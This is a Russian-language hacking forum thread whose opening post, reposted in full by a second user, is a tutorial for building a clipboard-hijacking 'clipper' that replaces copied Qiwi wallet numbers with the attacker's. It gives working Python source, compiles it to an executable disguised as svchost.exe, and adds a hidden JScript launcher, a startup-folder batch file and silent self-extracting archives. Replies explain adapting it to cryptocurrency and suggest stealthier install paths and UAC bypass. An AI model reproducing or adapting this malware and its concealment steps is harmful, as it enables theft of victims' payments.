Что такое клиппер [делаем клиппер для подмены кошельков]

[Tundra21_a]

Клиппер - программа, которая выполняет функцию подмены кошельков в буфере обмена. Во время оплаты, клиппер подменяет скопированные юзером адреса электронных кошельков и подменяет их на ваши.

Сразу напишу что для этого понадобится python 3.5 https://www.python.org/downloads/

Скачиваем,устанавливаем тут нечего сложного обязательно поставьте галочку чтоб питон добавили в Patch

далее выходим из системы чтоб всё сохранилось

входим обратно нажимаем win+R

прописываем туда cmd и нажимаем ок

в консоли проверяем установился ли у нас питон командой python

если у нас выдало информацию о версии питона, то всё норм если же нет то вы не поставили галочку напротив Patch

далее пишем в консоли

Код:

pip install pyperclip

Ждём установки потом если не выдало ошибок пишем

Код:

pip install pyinstaller

проверяем всё ли установилось командой

Код:

pip list

далее открываем сам python

нажимаем файл, новый проект и вставляем код

Код:

import pyperclip
import time
while True:
  num = pyperclip.paste()
  c = 0
  for i in num:
    try:
      int(i)
      c += 1
    except ValueError:
      pass
  if [s for s in num if s in '+']:
    if int(c)==12:
      pyperclip.copy("+3807********")
      time.sleep(3)
 
  if [s for s in num if s in '+']:
    if int(c)==11:
      pyperclip.copy("+790********")
      time.sleep(3)
 
  elif int(c)==12:
      pyperclip.copy("3807********")
      time.sleep(3)
 
  elif int(c)==11:
      pyperclip.copy("790********")
      time.sleep(3)

далее сохраняем всё это в папку с нашим питоном и опять идём к консоли

в консоли заходим в папку где лежит файл.ру и пишем команду pyinstaller -F имя_файла.ру и все! (параметр -F создает один файл)

появился наш ехе файл в папке с питоном в папке dist это и есть наша основа вируса (проверьте всё ли работает должным образом)

далее создаем на рабочем столе папку называем как угодно и кидаем туда наш ехе файл создаём текстовый документ.

открываем и вставляем туда код который будет запускать нашь ехе скрытно

Код:

var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("svchost.exe",0);

не забудьте переименовать наш ехе в svchost.exe (как назовёте ехе такой и будет процесс в диспетчере)

когда вставили код нажимаем сохранить как и сохраняем с названием star2t и расширением js после сохранения у нас должен появится файл star2t.js

теперь создаём ещё один текстовый документ который будет отвечать за запуск нашего файла после перезагрузки пк

вставляем туда код

echo off

cd C:\LocalStorage\win32\drivers

star2t.js

C:\LocalStorage\win32\drivers

star2t.js это путь куда я буду распаковывать файлы вируса у вас он может быть другой

теперь сохраняем как наш текстовик с названием start и расширением .bat после сохранения должен получится файл start.bat

теперь выделяем файлы svchost.exe и star2t.js и создаём sfx архив с путём распаковки C:\LocalStorage\win32\drivers

обязательно ставим галочки на пунктах скрыть всё и перезапись без подтверждения

всё в графу инсталл ничего не вписываем

далее выделяем файл start.bat и тоже создаём sfx архив в путь уже прописываем

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

и тоже ставим галочки на против скрыть всё и перезапись без подтверждения но уже прописываем в графе инсталл start.bat чтоб после распаковки он у нас запустился

теперь выделяем два наших sfx архива и тоже делаем из них тоже sfx архив

)путь распаковки C:\LocalStorage\win32\drivers галочки напротив спрятать всё и перезапись без последствий в инсталл прописываем запуск наших двух sfx архивов сначала с вирусом потом с батником можете ставить иконку вирус готов

фуд полностью чистый

 

[User_67537]

тут я понял для киви только, а для криптовалюты тоже самое или что? можешь скинуть пример кода для криптовалюты?

 

[cupertin]

тут я понял для киви только, а для криптовалюты тоже самое или что? можешь скинуть пример кода для криптовалюты?

Просто ставишь сколько цифр должно быть и ставишь свой кошелек)

 

[User_67537]

Просто ставишь сколько цифр должно быть и ставишь свой кошелек)

спасибо, понял, разобрался все работает)

 

[Crypto.Nik]

Клиппер - программа, которая выполняет функцию подмены кошельков в буфере обмена. Во время оплаты, клиппер подменяет скопированные юзером адреса электронных кошельков и подменяет их на ваши.

Сразу напишу что для этого понадобится python 3.5 https://www.python.org/downloads/

Скачиваем,устанавливаем тут нечего сложного обязательно поставьте галочку чтоб питон добавили в Patch

далее выходим из системы чтоб всё сохранилось

входим обратно нажимаем win+R

прописываем туда cmd и нажимаем ок

в консоли проверяем установился ли у нас питон командой python

если у нас выдало информацию о версии питона, то всё норм если же нет то вы не поставили галочку напротив Patch

далее пишем в консоли

Код:

pip install pyperclip

Ждём установки потом если не выдало ошибок пишем

Код:

pip install pyinstaller

проверяем всё ли установилось командой

Код:

pip list

далее открываем сам python

нажимаем файл, новый проект и вставляем код

Код:

import pyperclip
import time
while True:
  num = pyperclip.paste()
  c = 0
  for i in num:
    try:
      int(i)
      c += 1
    except ValueError:
      pass
  if [s for s in num if s in '+']:
    if int(c)==12:
      pyperclip.copy("+3807********")
      time.sleep(3)
 
  if [s for s in num if s in '+']:
    if int(c)==11:
      pyperclip.copy("+790********")
      time.sleep(3)
 
  elif int(c)==12:
      pyperclip.copy("3807********")
      time.sleep(3)
 
  elif int(c)==11:
      pyperclip.copy("790********")
      time.sleep(3)

далее сохраняем всё это в папку с нашим питоном и опять идём к консоли

в консоли заходим в папку где лежит файл.ру и пишем команду pyinstaller -F имя_файла.ру и все! (параметр -F создает один файл)

появился наш ехе файл в папке с питоном в папке dist это и есть наша основа вируса (проверьте всё ли работает должным образом)

далее создаем на рабочем столе папку называем как угодно и кидаем туда наш ехе файл создаём текстовый документ.

открываем и вставляем туда код который будет запускать нашь ехе скрытно

Код:

var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("svchost.exe",0);

не забудьте переименовать наш ехе в svchost.exe (как назовёте ехе такой и будет процесс в диспетчере)

когда вставили код нажимаем сохранить как и сохраняем с названием star2t и расширением js после сохранения у нас должен появится файл star2t.js

теперь создаём ещё один текстовый документ который будет отвечать за запуск нашего файла после перезагрузки пк

вставляем туда код

echo off

cd C:\LocalStorage\win32\drivers

star2t.js

C:\LocalStorage\win32\drivers

star2t.js это путь куда я буду распаковывать файлы вируса у вас он может быть другой

теперь сохраняем как наш текстовик с названием start и расширением .bat после сохранения должен получится файл start.bat

теперь выделяем файлы svchost.exe и star2t.js и создаём sfx архив с путём распаковки C:\LocalStorage\win32\drivers

обязательно ставим галочки на пунктах скрыть всё и перезапись без подтверждения

всё в графу инсталл ничего не вписываем

далее выделяем файл start.bat и тоже создаём sfx архив в путь уже прописываем

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

и тоже ставим галочки на против скрыть всё и перезапись без подтверждения но уже прописываем в графе инсталл start.bat чтоб после распаковки он у нас запустился

теперь выделяем два наших sfx архива и тоже делаем из них тоже sfx архив

)путь распаковки C:\LocalStorage\win32\drivers галочки напротив спрятать всё и перезапись без последствий в инсталл прописываем запуск наших двух sfx архивов сначала с вирусом потом с батником можете ставить иконку вирус готов

фуд полностью чистый

привет! а что версия 3.6.5 не пойдет? просто я в это м деле нуб пока только все начинаю

 

[neCARROTkiy]

А в чем сакральный смысл проверять вхождение "+" через такой костыль?

if [s for s in num if s in '+']:

достаточно было бы:

if '+' in num:

или:

if num.startswith('+'):

Или ТС просто скопировал это откуда-то особо не разбираясь в том как писать код на питоне ?

 

[Reiko]

Неплохо, но сыровато, ИМХО.
Нет, я не думаю, что ТС откуда-то это спастил, хотя все может быть. Хотя 100% работа кода тоже не гарантируется
Конкретно по замечаниям:
1) как подсказывает товарищ neCARROTkiy, действительно сделать

if num.startswith('+'):

было бы правильнее
2) очень глубокое ИМХО, но лучше юзать регэкспы. Спорный вопрос, согласен, но это, как бы парадоксально ни звучало, удобный способ проверять формат кошелька/номера. Также будет очень легко переделать его на крипту/вебмани/что угодно еще, просто изменив выражение и подставив нужный формат.
3) это все под какую винду, уважаемый ТС? Путь C:\LocalStorage - малость заметный, да и папку эту лучше создать заранее в коде. Хотите залить бинарник в папку пользователя - юзайте паттерн %APPDATA%, как вариант. А распаковывать такие вещи в корень системного диска - плохая идея. Уж лучше тогда невидимую папку сделать где-то в недрах Windows. Обход UAC - отдельная тема, разумеется, но все ж не так палевно.
А в целом как концепт - весьма любопытно.